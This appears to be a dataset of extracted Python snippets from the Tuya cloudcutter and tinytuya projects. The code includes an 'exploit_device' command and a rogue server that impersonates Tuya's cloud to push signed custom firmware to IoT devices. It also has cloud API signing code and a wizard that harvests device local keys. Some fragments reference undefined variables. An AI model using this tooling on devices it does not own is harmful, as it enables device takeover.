print(f"Configuration file {args.config} does not exist", file=sys.stderr)
sys.exit(10)
if not os.path.isfile(args.profile):
print(f"Provided device profile JSON {args.profile} does not exist, or is not a file", file=sys.stderr)
sys.exit(30)
config = DeviceConfig.read(args.config)
authkey, uuid, pskkey = config.get_bytes(DeviceConfig.AUTH_KEY, default=DEFAULT_AUTH_KEY), config.get_bytes(DeviceConfig.UUID), config.get_bytes(DeviceConfig.PSK, default="")
if len(pskkey) == 0:
pskkey = None
context = PSKContext(authkey=authkey, uuid=uuid, psk=pskkey)
device_id, local_key = config.get(DeviceConfig.DEVICE_ID), config.get(DeviceConfig.LOCAL_KEY)
flash_timeout = 15
if args.flash_timeout is not None:
flash_timeout = args.flash_timeout
mqtt.mqtt_connect(device_id, local_key, tornado.ioloop.IOLoop.current(), graceful_exit_timeout=flash_timeout, verbose_output=args.verbose_output)
with open(args.profile, "r") as f:
combined = json.load(f)
device = combined["device"]
def trigger_payload_endpoint_hook(handler, *_):
if update_firmware:
task_function = __trigger_firmware_update
task_args = (config, args)
else:
task_args = (handler.request.remote_ip, config, args.ssid, args.password)
task_function = __configure_ssid_on_device
tornado.ioloop.IOLoop.current().call_later(0, task_function, *task_args)
return None
def upgrade_endpoint_hook(handler, *_):
global payload_trigger_time
# Don't allow duplicates in a short period of time, but allow re-triggering if a new connection is made.
if payload_trigger_time is not None and payload_trigger_time + timedelta(minutes=1) > datetime.now():
print("Discarding duplicate upgrade request to avoid race condition.")
return { "result": { "success": True, "t": int(time.time()) }}
payload_trigger_time = datetime.now()
with open(args.firmware, "rb") as fs:
upgrade_data = fs.read()
sec_key = config.get_bytes(DeviceConfig.SEC_KEY)
file_sha = sha256(upgrade_data).hexdigest().upper().encode("utf-8")
file_hmac = hmac.digest(sec_key, file_sha, sha256).hex().upper()
firmware_filename = os.path.basename(args.firmware)
return {
"result": {
"url": f"http://{args.ip}:80/files/{firmware_filename}",
"hmac": file_hmac,
"version": "9.0.0",
"size": str(len(upgrade_data)),
"type": 0,
},
"success": True,
"t": int(time.time())
}
def active_endpoint_hook(handler, *_):
# active should reset payload trigger time, in case the device reconnected and asked to activate.
global payload_trigger_time
payload_trigger_time = None
schema_id, schema = list(device["schemas"].items())[0]
# Trigger the payload after active has fully registered.
tornado.ioloop.IOLoop.current().call_later(2, trigger_payload_endpoint_hook, *(handler, None))
return {
"result": {
"schema": json.dumps(schema, separators=(',', ':')),
"devId": "DUMMY",
"resetFactory": False,
"timeZone": "+02:00",
"capability": 1025,
"secKey": "DUMMY",
"stdTimeZone": "+01:00",
"schemaId": schema_id,
"dstIntervals": [],
"localKey": "DUMMY",
},
"success": True,
"t": int(time.time())
}
response_transformers = __configure_local_device_response_transformers(config)
endpoint_hooks = {
"tuya.device.active": active_endpoint_hook,
}
if update_firmware:
endpoint_hooks.update({
"tuya.device.upgrade.get": upgrade_endpoint_hook,
"tuya.device.upgrade.silent.get": upgrade_endpoint_hook,
})
application = tornado.web.Application([
(r'/v1/url_config', handlers.GetURLHandlerV1, dict(ipaddr=args.ip, verbose_output=args.verbose_output)),
(r'/v2/url_config', handlers.GetURLHandlerV2, dict(ipaddr=args.ip, verbose_output=args.verbose_output)),
# 2018 SDK specific endpoint
(r'/device/url_config', handlers.OldSDKGetURLHandler, dict(ipaddr=args.ip, verbose_output=args.verbose_output)),
(r'/d.json', handlers.DetachHandler, dict(schema_directory=args.schema, response_transformers=response_transformers, config=config, endpoint_hooks=endpoint_hooks, verbose_output=args.verbose_output)),
(f'/files/(.*)', handlers.OTAFilesHandler, dict(path="/work/custom-firmware/", graceful_exit_timeout=args.flash_timeout, verbose_output=args.verbose_output)),
])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(80)
https_server = tornado.httpserver.HTTPServer(application, ssl_options=context)
https_server.listen(443)
# 2018 SDK seems to request that port for some reason
dns_https_server = tornado.httpserver.HTTPServer(application, ssl_options=context)
dns_https_server.listen(4433)
tornado.ioloop.IOLoop.current().start()
sys.exit(0)
def __update_firmware(args):
if not os.path.isfile(args.firmware):
# try as a relative path
args.firmware = os.path.join(args.firmware_dir, args.firmware)
if not os.path.isfile(args.firmware):
print(f"Firmware {args.firmware} does not exist or not a file.", file=sys.stderr)
sys.exit(50)
UG_FILE_MAGIC = b"\x55\xAA\x55\xAA"
FILE_MAGIC_DICT = {
b"RBL\x00": "RBL",
b"\x43\x09\xb5\x96": "QIO",
b"\x2f\x07\xb5\x94": "UA"
}
with open(args.firmware, "rb") as fs:
magic = fs.read(4)
error_code = 0
if magic in FILE_MAGIC_DICT:
print(f"Firmware {args.firmware} is an {FILE_MAGIC_DICT[magic]} file! Please provide a UG file.", file=sys.stderr)
error_code = 51
elif magic != UG_FILE_MAGIC:
print(f"Firmware {args.firmware} is not a UG file.", file=sys.stderr)
error_code = 52
else:
# File is a UG file
error_code = 0
pass
if error_code != 0:
sys.exit(error_code)
__configure_local_device_or_update_firmware(args, update_firmware=True)
def __exploit_device(args):
output_dir = args.output_directory
if not (os.path.exists(output_dir) and os.path.isdir(output_dir)):
print(f"Provided output directory {output_dir} does not exist or not a directory", file=sys.stderr)
sys.exit(60)
try:
with open(args.profile, "r") as fs:
combined = json.load(fs)
except (OSError, KeyError):
print(f"Could not load profile {args.profile}. Are you sure the profile file exists and is a valid combined JSON?", file=sys.stderr)
sys.exit(65)
device_config = exploit_device_with_config(args, combined)
device_uuid = device_config.get(DeviceConfig.UUID)
output_path = os.path.join(output_dir, f"{device_uuid}.deviceconfig")
device_config.write(output_path)
print("Exploit run, saved device config too!")
# To communicate with external scripts
print(f"output={output_path}")
def __write_deviceconfig(args):
output_dir = args.output_directory
if not (os.path.exists(output_dir) and os.path.isdir(output_dir)):
print(f"Provided output directory {output_dir} does not exist or not a directory", file=sys.stderr)
sys.exit(60)
try:
with open(args.profile, "r") as fs:
combined = json.load(fs)
except (OSError, KeyError):
print(f"Could not load profile {args.profile}. Are you sure the profile file exists and is a valid combined JSON?", file=sys.stderr)
sys.exit(65)
device_config = create_device_specific_config(args, combined, args.uuid, args.auth_key, args.psk_key)
output_path = os.path.join(output_dir, f"{args.uuid}.deviceconfig")
device_config.write(output_path)
print("Saved device config.")
# To communicate with external scripts
print(f"output={output_path}")
def __configure_wifi(args):
SSID = args.SSID
password = args.password
# Pass the payload through the json module specifically
# to avoid issues with special chars (e.g. ") in either
# SSIDs or passwords.
payload = {"ssid": SSID, "token": "AAAAAAAA"}
# Configure the password ONLY if it's present
# Some devices may parse incorrectly otherwise
if password:
payload["passwd"] = password
payload = json.dumps(payload)
datagram = build_network_config_packet(payload.encode('ascii'))
    # Send the configuration datagram a few times with a minor delay
# May improve reliability in some setups
for _ in range(5):
send_network_config_datagram(datagram)
time.sleep(0.300)
print(f"Configured device to connect to '{SSID}'")
def __validate_localapicredential_arg(length):
def check_arg(value):
if (len(value) == 0):
return value
elif (len(value) != length):
raise argparse.ArgumentTypeError("%s length is invalid, it must be %s characters long" % value, length)
elif (not re.compile('[a-zA-Z0-9]').match(value)):
raise argparse.ArgumentTypeError("%s value is invalid, it must contain only letters or numbers" % value)
return value
return check_arg
def parse_args():
parser = argparse.ArgumentParser(
prog="cloudcutter",
description="Detach tuya devices from the cloud or install custom firmware on them",
)
subparsers = parser.add_subparsers(dest="command", required=True, help="subcommand to execute")
parser_configure = subparsers.add_parser("configure_local_device", help="Configure detached device with local keys and onboard it on desired WiFi AP")
parser_configure.add_argument("profile", help="Device profile directory to use for detaching")
parser_configure.add_argument("schema", help="Endpoint schemas directory to use for detaching")
parser_configure.add_argument("config", help="Device configuration file")
parser_configure.add_argument("flash_timeout", help="Not used for cutting mode", type=int)
parser_configure.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_configure.add_argument(
"--ip",
dest="ip",
default="10.42.42.1",
help="IP address to listen on and respond to the devices with (default: 10.42.42.1)",
)
parser_configure.add_argument(
"--ssid",
required=True,
help="SSID that the device will be onboarded on after configuration",
)
parser_configure.add_argument(
"--password",
required=False,
default="",
help="Password of the SSID for device onboarding (default: empty)",
)
parser_configure.set_defaults(handler=__configure_local_device_or_update_firmware)
parser_update_firmware = subparsers.add_parser("update_firmware", help="Update the device's firmware")
parser_update_firmware.add_argument("profile", help="Device profile JSON file (combined)")
parser_update_firmware.add_argument("schema", help="Endpoint schemas directory to use for updating")
parser_update_firmware.add_argument("config", help="Device configuration file")
parser_update_firmware.add_argument("firmware_dir", help="Directory containing firmware images")
parser_update_firmware.add_argument("firmware", help="OTA firmware image to update the device to")
parser_update_firmware.add_argument("flash_timeout", help="Number of seconds to wait before exiting after receiving flash", type=int)
parser_update_firmware.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_update_firmware.add_argument(
"--ip",
dest="ip",
default="10.42.42.1",
help="IP address to listen on and respond to the devices with (default: 10.42.42.1)",
)
parser_update_firmware.set_defaults(handler=__update_firmware)
parser_exploit_device = subparsers.add_parser(
"exploit_device",
help="Exploit a device - requires that the attacking system is on the device's AP"
)
parser_exploit_device.add_argument("profile", help="Device profile JSON file (combined)")
parser_exploit_device.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_exploit_device.add_argument(
"--output-directory",
dest="output_directory",
required=False,
default="/work/configured-devices",
help="A directory to which the modified device parameters file will be written (default: <workdir>/configured-devices)"
)
parser_exploit_device.add_argument(
"--deviceid",
dest="device_id",
required=False,
default="",
help="deviceid assigned to the device (default: Random)",
type=__validate_localapicredential_arg(20),
)
parser_exploit_device.add_argument(
"--localkey",
dest="local_key",
required=False,
default="",
help="localkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(16),
)
parser_exploit_device.set_defaults(handler=__exploit_device)
parser_write_deviceconfig = subparsers.add_parser(
"write_deviceconfig",
help="Write the deviceconfig to use to for Tuya API emulation."
)
parser_write_deviceconfig.add_argument("profile", help="Device profile JSON file (combined)")
parser_write_deviceconfig.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_write_deviceconfig.add_argument(
"--output-directory",
dest="output_directory",
required=False,
default="/work/configured-devices",
help="A directory to which the modified device parameters file will be written (default: <workdir>/configured-devices)"
)
parser_write_deviceconfig.add_argument(
"--deviceid",
dest="device_id",
required=False,
default="",
help="deviceid assigned to the device (default: Random)",
type=__validate_localapicredential_arg(20),
)
parser_write_deviceconfig.add_argument(
"--localkey",
dest="local_key",
required=False,
default="",
help="localkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(16),
)
parser_write_deviceconfig.add_argument(
"--authkey",
dest="auth_key",
required=True,
default="",
help="authkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(32),
)
parser_write_deviceconfig.add_argument(
"--uuid",
dest="uuid",
required=True,
default="",
help="uuid assigned to the device (default: Random)",
type=__validate_localapicredential_arg(16),
)
parser_write_deviceconfig.add_argument(
"--pskkey",
dest="psk_key",
required=True,
default="",
help="pskkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(37),
)
parser_write_deviceconfig.set_defaults(handler=__write_deviceconfig)
parser_configure_wifi = subparsers.add_parser(
"configure_wifi",
help="Makes a device to which you're connected via its AP mode join a given WiFi network"
)
parser_configure_wifi.add_argument("SSID", help="WiFi access point name to make the device join")
parser_configure_wifi.add_argument("password", help="WiFi access point password")
parser_configure_wifi.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_configure_wifi.set_defaults(handler=__configure_wifi)
return parser.parse_args() | null |
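__configure_wifi above routes the onboarding payload through the json module instead of string formatting so that quotes in SSIDs or passwords are escaped correctly, and it only adds the passwd key when a password is present. A small illustration with hypothetical credentials:

import json

ssid, password = 'My "Guest" WiFi', 'pa"ss'   # hypothetical values
payload = {"ssid": ssid, "token": "AAAAAAAA"}
if password:  # omit the key entirely when the network is open
    payload["passwd"] = password
print(json.dumps(payload))
# {"ssid": "My \"Guest\" WiFi", "token": "AAAAAAAA", "passwd": "pa\"ss"}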
188,493 | import random
import socket
import string
import struct
import time
import zlib
from distutils.command.config import config
from typing import Dict
from .device import DeviceConfig
def encode_json_val(value):
encoded = []
escaped = list(map(ord, '"\\'))
escape_char = ord('\\')
for i in value:
if i in escaped:
encoded.append(escape_char)
encoded.append(i)
return bytes(encoded) | null |
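encode_json_val above backslash-escapes quote and backslash bytes so a raw value can be embedded inside a JSON string literal. A quick check, assuming the function from the snippet above is in scope; the input is arbitrary:

raw = b'say "hi" \\ bye'
print(encode_json_val(raw))  # b'say \\"hi\\" \\\\ bye'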
188,494 | import base64
import json
import socket
import ssl
import sys
import time
import os
import tornado.httpserver
import tornado.ioloop
import tornado.web
from pskcontext import PSKContext
from tuyacipher import TuyaCipher, TuyaCipherKeyChoice
import hmac
from hashlib import sha256
def object_to_json(obj):
return json.dumps(obj, separators=(',',':')) | null |
188,495 | import base64
import json
import socket
import ssl
import sys
import time
import os
import tornado.httpserver
import tornado.ioloop
import tornado.web
from pskcontext import PSKContext
from tuyacipher import TuyaCipher
def object_to_json(obj):
return json.dumps(obj, separators=(',',':')) | null |
188,496 | import tinytuya
import json
import time
tuyadevices = []
for i in tuyadevices:
item = {}
name = i['name']
(ip, ver) = getIP(devices, i['id'])
item['name'] = name
item['ip'] = ip
item['ver'] = ver
item['id'] = i['id']
item['key'] = i['key']
if (ip == 0):
print(" %s[%s] - %s%s - %sError: No IP found%s" %
(subbold, name, dim, ip, alert, normal))
else:
try:
d = tinytuya.OutletDevice(i['id'], ip, i['key'])
if ver == "3.3":
d.set_version(3.3)
data = d.status()
if 'dps' in data:
item['dps'] = data
state = alertdim + "Off" + dim
try:
if '1' in data['dps'] or '20' in data['dps']:
state = bold + "On" + dim
print(" %s[%s] - %s%s - %s - DPS: %r" %
(subbold, name, dim, ip, state, data['dps']))
else:
print(" %s[%s] - %s%s - DPS: %r" %
(subbold, name, dim, ip, data['dps']))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
else:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
polling.append(item)
def tuyaLookup(deviceid):
for i in tuyadevices:
if (i['id'] == deviceid):
return (i['name'], i['key'])
return ("", "") | null |
188,497 | import tinytuya
import json
import time
def getIP(d, gwid):
for ip in d:
if (gwid == d[ip]['gwId']):
return (ip, d[ip]['version'])
return (0, 0) | null |
188,498 | import tinytuya
import json
import time
print("%-25s %-24s %-16s %-17s %-5s" % ("Name","ID", "IP","Key","Version"))
for item in data["devices"]:
print("%-25.25s %-24s %-16s %-17s %-5s" % (
item["name"],
item["id"],
item["ip"],
item["key"],
item["ver"]))
for item in data["devices"]:
print("\nDevice: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
status = d.status()
print(status)
def turn_on(name):
# find the right item that matches name
for item in data["devices"]:
if item["name"] == name:
break
print("\nTurning On: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
d.set_status(True) | null |
188,499 | import tinytuya
import json
import time
print("%-25s %-24s %-16s %-17s %-5s" % ("Name","ID", "IP","Key","Version"))
for item in data["devices"]:
print("%-25.25s %-24s %-16s %-17s %-5s" % (
item["name"],
item["id"],
item["ip"],
item["key"],
item["ver"]))
for item in data["devices"]:
print("\nDevice: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
status = d.status()
print(status)
def turn_off(name):
# find the right item that matches name
for item in data["devices"]:
if item["name"] == name:
break
print("\nTurning Off: %s" % item["name"])
d = tinytuya.OutletDevice(item["id"], item["ip"], item["key"])
d.set_version(float(item["ver"]))
d.set_status(False) | null |
188,500 | import tinytuya
import colorsys
import time
id = DEVICEID
cmd_code = 'colour_data_v2'
c = tinytuya.Cloud()
def set_color(rgb):
hsv = colorsys.rgb_to_hsv(rgb[0] / 255.0, rgb[1] / 255.0, rgb[2] / 255.0)
commands = {
'commands': [{
'code': cmd_code,
'value': {
"h": int(hsv[0] * 360),
"s": int(hsv[1] * 1000),
"v": int(hsv[2] * 1000)
}
}]
}
c.sendcommand(id, commands) | null |
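set_color above maps an RGB triple into the ranges Tuya's colour_data_v2 command expects (hue 0-360, saturation and value 0-1000). The mapping itself needs nothing but colorsys; the colour below is a sample and no cloud call is made.

import colorsys

rgb = (255, 128, 0)  # sample colour (orange)
h, s, v = colorsys.rgb_to_hsv(rgb[0] / 255.0, rgb[1] / 255.0, rgb[2] / 255.0)
value = {"h": int(h * 360), "s": int(s * 1000), "v": int(v * 1000)}
print(value)  # {'h': 30, 's': 1000, 'v': 1000}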
188,501 | import colorsys
from dataclasses import dataclass
from typing import Tuple, List, Literal
import tinytuya
def tuyahex2hsv(val: str):
return tinytuya.BulbDevice._hexvalue_to_hsv(val, bulb="B") | null |
188,502 | import colorsys
from dataclasses import dataclass
from typing import Tuple, List, Literal
import tinytuya
def hsv2tuyahex(h: float, s: float, v: float):
(r, g, b) = colorsys.hsv_to_rgb(h, s, v)
hexvalue = tinytuya.BulbDevice._rgb_to_hexvalue(
r * 255.0, g * 255.0, b * 255.0, bulb='B'
)
return hexvalue | null |
188,503 | import requests
import time
import hmac
import hashlib
import json
import pprint
import logging
import tinytuya
try:
input = raw_input
except NameError:
pass
def tuyaPlatform(apiRegion, apiKey, apiSecret, uri, token=None, new_sign_algorithm=True, body=None, headers=None):
"""Tuya IoT Platform Data Access
Parameters:
* region Tuya API Server Region: us, eu, cn, in, us-e, eu-w
* apiKey Tuya Platform Developer ID
* apiSecret Tuya Platform Developer secret
* uri Tuya Platform URI for this call
* token Tuya OAuth Token
    Payload Construction - Header Data:
Parameter Type Required Description
client_id String Yes client_id
signature String Yes HMAC-SHA256 Signature (see below)
sign_method String Yes Message-Digest Algorithm of the signature: HMAC-SHA256.
        t Long Yes 13-digit standard timestamp (now in milliseconds).
lang String No Language. It is zh by default in China and en in other areas.
access_token String * Required for service management calls
Signature Details:
* OAuth Token Request: signature = HMAC-SHA256(KEY + t, SECRET).toUpperCase()
* Service Management: signature = HMAC-SHA256(KEY + access_token + t, SECRET).toUpperCase()
URIs:
* Get Token = https://openapi.tuyaus.com/v1.0/token?grant_type=1
* Get UserID = https://openapi.tuyaus.com/v1.0/devices/{DeviceID}
* Get Devices = https://openapi.tuyaus.com/v1.0/users/{UserID}/devices
REFERENCE: https://images.tuyacn.com/smart/docs/python_iot_code_sample.py
"""
# Set hostname based on apiRegion
apiRegion = apiRegion.lower()
urlhost = "openapi.tuyacn.com" # China Data Center
if(apiRegion == "us"):
urlhost = "openapi.tuyaus.com" # Western America Data Center
if(apiRegion == "us-e"):
urlhost = "openapi-ueaz.tuyaus.com" # Eastern America Data Center
if(apiRegion == "eu"):
urlhost = "openapi.tuyaeu.com" # Central Europe Data Center
if(apiRegion == "eu-w"):
urlhost = "openapi-weaz.tuyaeu.com" # Western Europe Data Center
if(apiRegion == "in"):
urlhost = "openapi.tuyain.com" # India Datacenter
# Build URL
url = "https://%s/v1.0/%s" % (urlhost, uri)
# Build Header
now = int(time.time()*1000)
headers = dict(list(headers.items()) + [('Signature-Headers', ":".join(headers.keys()))]) if headers else {}
if(token==None):
payload = apiKey + str(now)
headers['secret'] = apiSecret
else:
payload = apiKey + token + str(now)
    # If running the post-6-30-2021 signing algorithm, update the payload to include its data
if new_sign_algorithm: payload += ('GET\n' + # HTTPMethod
hashlib.sha256(bytes((body or "").encode('utf-8'))).hexdigest() + '\n' + # Content-SHA256
''.join(['%s:%s\n'%(key, headers[key]) # Headers
for key in headers.get("Signature-Headers", "").split(":")
if key in headers]) + '\n' +
'/' + url.split('//', 1)[-1].split('/', 1)[-1])
# Sign Payload
signature = hmac.new(
apiSecret.encode('utf-8'),
msg=payload.encode('utf-8'),
digestmod=hashlib.sha256
).hexdigest().upper()
# Create Header Data
headers['client_id'] = apiKey
headers['sign'] = signature
headers['t'] = str(now)
headers['sign_method'] = 'HMAC-SHA256'
if(token != None):
headers['access_token'] = token
# Get Token
response = requests.get(url, headers=headers)
try:
response_dict = json.loads(response.content.decode())
except:
try:
response_dict = json.loads(response.content)
except:
print("Failed to get valid JSON response")
return(response_dict)
The provided code snippet includes necessary dependencies for implementing the `wizard` function. Write a Python function `def wizard(color=True, retries=None)` to solve the following problem:
TinyTuya Setup Wizard Tuya based WiFi smart devices Parameter: color = True or False, print output in color [Default: True] retries = Number of retries to find IP address of Tuya Devices Description Setup Wizard will prompt user for Tuya IoT Developer credentials and will gather all of the Device IDs and their Local KEYs. It will save the credentials and the device data in the tinytuya.json and devices.json configuration files respectively. HOW to set up your Tuya IoT Developer account: iot.tuya.com: https://github.com/jasonacox/tinytuya#get-the-tuya-device-local-key Credits * Tuya API Documentation https://developer.tuya.com/en/docs/iot/open-api/api-list/api?id=K989ru6gtvspg * TuyaAPI https://github.com/codetheweb/tuyapi by codetheweb and blackrozes The TuyAPI/CLI wizard inspired and informed this python version.
Here is the function:
def wizard(color=True, retries=None):
"""
TinyTuya Setup Wizard Tuya based WiFi smart devices
Parameter:
color = True or False, print output in color [Default: True]
retries = Number of retries to find IP address of Tuya Devices
Description
Setup Wizard will prompt user for Tuya IoT Developer credentials and will gather all of
the Device IDs and their Local KEYs. It will save the credentials and the device
data in the tinytuya.json and devices.json configuration files respectively.
HOW to set up your Tuya IoT Developer account: iot.tuya.com:
https://github.com/jasonacox/tinytuya#get-the-tuya-device-local-key
Credits
* Tuya API Documentation
https://developer.tuya.com/en/docs/iot/open-api/api-list/api?id=K989ru6gtvspg
* TuyaAPI https://github.com/codetheweb/tuyapi by codetheweb and blackrozes
The TuyAPI/CLI wizard inspired and informed this python version.
"""
# Get Configuration Data
CONFIGFILE = 'tinytuya.json'
DEVICEFILE = 'devices.json'
RAWFILE = 'tuya-raw.json'
SNAPSHOTFILE = 'snapshot.json'
config = {}
config['apiKey'] = ''
config['apiSecret'] = ''
config['apiRegion'] = ''
config['apiDeviceID'] = ''
needconfigs = True
try:
# Load defaults
with open(CONFIGFILE) as f:
config = json.load(f)
except:
# First Time Setup
pass
if(color == False):
# Disable Terminal Color Formatting
bold = subbold = normal = dim = alert = alertdim = ""
else:
# Terminal Color Formatting
bold = "\033[0m\033[97m\033[1m"
subbold = "\033[0m\033[32m"
normal = "\033[97m\033[0m"
dim = "\033[0m\033[97m\033[2m"
alert = "\033[0m\033[91m\033[1m"
alertdim = "\033[0m\033[91m\033[2m"
print(bold + 'TinyTuya Setup Wizard' + dim + ' [%s]' % (tinytuya.version) + normal)
print('')
if(config['apiKey'] != '' and config['apiSecret'] != '' and
config['apiRegion'] != '' and config['apiDeviceID'] != ''):
needconfigs = False
print(" " + subbold + "Existing settings:" + dim +
"\n API Key=%s \n Secret=%s\n DeviceID=%s\n Region=%s" %
(config['apiKey'], config['apiSecret'], config['apiDeviceID'],
config['apiRegion']))
print('')
answer = input(subbold + ' Use existing credentials ' +
normal + '(Y/n): ')
if(answer[0:1].lower() == 'n'):
needconfigs = True
if(needconfigs):
# Ask user for config settings
print('')
config['apiKey'] = input(subbold + " Enter " + bold + "API Key" + subbold +
" from tuya.com: " + normal)
config['apiSecret'] = input(subbold + " Enter " + bold + "API Secret" + subbold +
" from tuya.com: " + normal)
config['apiDeviceID'] = input(subbold +
" Enter " + bold + "any Device ID" + subbold +
" currently registered in Tuya App (used to pull full list): " + normal)
# TO DO - Determine apiRegion based on Device - for now, ask
print("\n " + subbold + "Region List" + dim +
"\n cn\tChina Data Center" +
"\n us\tUS - Western America Data Center" +
"\n us-e\tUS - Eastern America Data Center" +
"\n eu\tCentral Europe Data Center" +
"\n eu-w\tWestern Europe Data Center" +
"\n in\tIndia Data Center\n")
config['apiRegion'] = input(subbold + " Enter " + bold + "Your Region" + subbold +
" (Options: cn, us, us-e, eu, eu-w, or in): " + normal)
# Write Config
json_object = json.dumps(config, indent=4)
with open(CONFIGFILE, "w") as outfile:
outfile.write(json_object)
print(bold + "\n>> Configuration Data Saved to " + CONFIGFILE)
print(dim + json_object)
KEY = config['apiKey']
SECRET = config['apiSecret']
DEVICEID = config['apiDeviceID']
REGION = config['apiRegion'] # us, eu, cn, in
LANG = 'en' # en or zh
# Get Oauth Token from tuyaPlatform
uri = 'token?grant_type=1'
response_dict = tuyaPlatform(REGION, KEY, SECRET, uri)
if not response_dict['success']:
print('\n\n' + bold + 'Error from Tuya server: ' + dim + response_dict['msg'])
return
token = response_dict['result']['access_token']
# Get UID from sample Device ID
uri = 'devices/%s' % DEVICEID
response_dict = tuyaPlatform(REGION, KEY, SECRET, uri, token)
if not response_dict['success']:
print('\n\n' + bold + 'Error from Tuya server: ' + dim + response_dict['msg'])
return
uid = response_dict['result']['uid']
# Use UID to get list of all Devices for User
uri = 'users/%s/devices' % uid
json_data = tuyaPlatform(REGION, KEY, SECRET, uri, token)
# Filter to only Name, ID and Key
tuyadevices = []
for i in json_data['result']:
item = {}
item['name'] = i['name'].strip()
item['id'] = i['id']
item['key'] = i['local_key']
tuyadevices.append(item)
# Display device list
print("\n\n" + bold + "Device Listing\n" + dim)
output = json.dumps(tuyadevices, indent=4) # sort_keys=True)
print(output)
# Save list to devices.json
print(bold + "\n>> " + normal + "Saving list to " + DEVICEFILE)
with open(DEVICEFILE, "w") as outfile:
outfile.write(output)
print(dim + " %d registered devices saved" % len(tuyadevices))
# Save raw TuyaPlatform data to tuya-raw.json
print(bold + "\n>> " + normal + "Saving raw TuyaPlatform response to " + RAWFILE)
try:
with open(RAWFILE, "w") as outfile:
outfile.write(json.dumps(json_data, indent=4))
except:
print('\n\n' + bold + 'Unable to save raw file' + dim )
# Find out if we should poll all devices
answer = input(subbold + '\nPoll local devices? ' +
normal + '(Y/n): ')
if(answer[0:1].lower() != 'n'):
# Set retries based on number of devices if undefined
if(retries == None):
retries = len(tuyadevices)+10+tinytuya.MAXCOUNT
# Scan network for devices and provide polling data
print(normal + "\nScanning local network for Tuya devices (retry %d times)..." % retries)
devices = tinytuya.deviceScan(False, retries)
print(" %s%s local devices discovered%s" %
(dim, len(devices), normal))
print("")
def getIP(d, gwid):
for ip in d:
if 'gwId' in d[ip]:
if (gwid == d[ip]['gwId']):
return (ip, d[ip]['version'])
return (0, 0)
polling = []
print("Polling local devices...")
for i in tuyadevices:
item = {}
name = i['name']
(ip, ver) = getIP(devices, i['id'])
item['name'] = name
item['ip'] = ip
item['ver'] = ver
item['id'] = i['id']
item['key'] = i['key']
if (ip == 0):
print(" %s[%s] - %s%s - %sError: No IP found%s" %
(subbold, name, dim, ip, alert, normal))
else:
try:
d = tinytuya.OutletDevice(i['id'], ip, i['key'])
if ver == "3.3":
d.set_version(3.3)
data = d.status()
if 'dps' in data:
item['dps'] = data
state = alertdim + "Off" + dim
try:
if '1' in data['dps'] or '20' in data['dps']:
if '1' in data['dps']:
if data['dps']['1'] == True:
state = bold + "On" + dim
if '20' in data['dps']:
if data['dps']['20'] == True:
state = bold + "On" + dim
print(" %s[%s] - %s%s - %s - DPS: %r" %
(subbold, name, dim, ip, state, data['dps']))
else:
print(" %s[%s] - %s%s - DPS: %r" %
(subbold, name, dim, ip, data['dps']))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
else:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
except:
print(" %s[%s] - %s%s - %sNo Response" %
(subbold, name, dim, ip, alertdim))
polling.append(item)
# for loop
        # Save polling data snapshot
current = {'timestamp' : time.time(), 'devices' : polling}
output = json.dumps(current, indent=4)
print(bold + "\n>> " + normal + "Saving device snapshot data to " + SNAPSHOTFILE)
with open(SNAPSHOTFILE, "w") as outfile:
outfile.write(output)
print("\nDone.\n")
return | TinyTuya Setup Wizard Tuya based WiFi smart devices Parameter: color = True or False, print output in color [Default: True] retries = Number of retries to find IP address of Tuya Devices Description Setup Wizard will prompt user for Tuya IoT Developer credentials and will gather all of the Device IDs and their Local KEYs. It will save the credentials and the device data in the tinytuya.json and devices.json configuration files respectively. HOW to set up your Tuya IoT Developer account: iot.tuya.com: https://github.com/jasonacox/tinytuya#get-the-tuya-device-local-key Credits * Tuya API Documentation https://developer.tuya.com/en/docs/iot/open-api/api-list/api?id=K989ru6gtvspg * TuyaAPI https://github.com/codetheweb/tuyapi by codetheweb and blackrozes The TuyAPI/CLI wizard inspired and informed this python version. |
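The signing rule quoted in tuyaPlatform's docstring above (token request: signature = HMAC-SHA256(KEY + t, SECRET), upper-cased) can be reproduced on its own. Note this is the simpler pre-2021 form; the post-2021 algorithm also appends the stringToSign shown in the function body. The key, secret, and timestamp here are placeholders, not real credentials.

import hashlib
import hmac
import time

api_key = "txxxxxxxxxxxxxxxxxxx"           # placeholder client_id
api_secret = "sxxxxxxxxxxxxxxxxxxxxxxxxx"  # placeholder secret
t = str(int(time.time() * 1000))           # 13-digit millisecond timestamp
payload = api_key + t                      # token request: no access_token yet
sign = hmac.new(api_secret.encode("utf-8"), payload.encode("utf-8"),
                hashlib.sha256).hexdigest().upper()
print(sign)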
188,504 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def ask_options(text, options):
res = inquirer.prompt(
[
inquirer.List(
"result",
carousel=True,
message=text,
choices=options,
)
]
)
if res is None:
# Ctrl+C
exit(1)
return res["result"]
def ask_files(text, dir):
files = [
path
for path in listdir(dir)
if not path.startswith(".") and isfile(join(dir, path))
]
path = ask_options(text, sorted(files, key=str.casefold))
return abspath(join(dir, path)) | null |
188,505 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
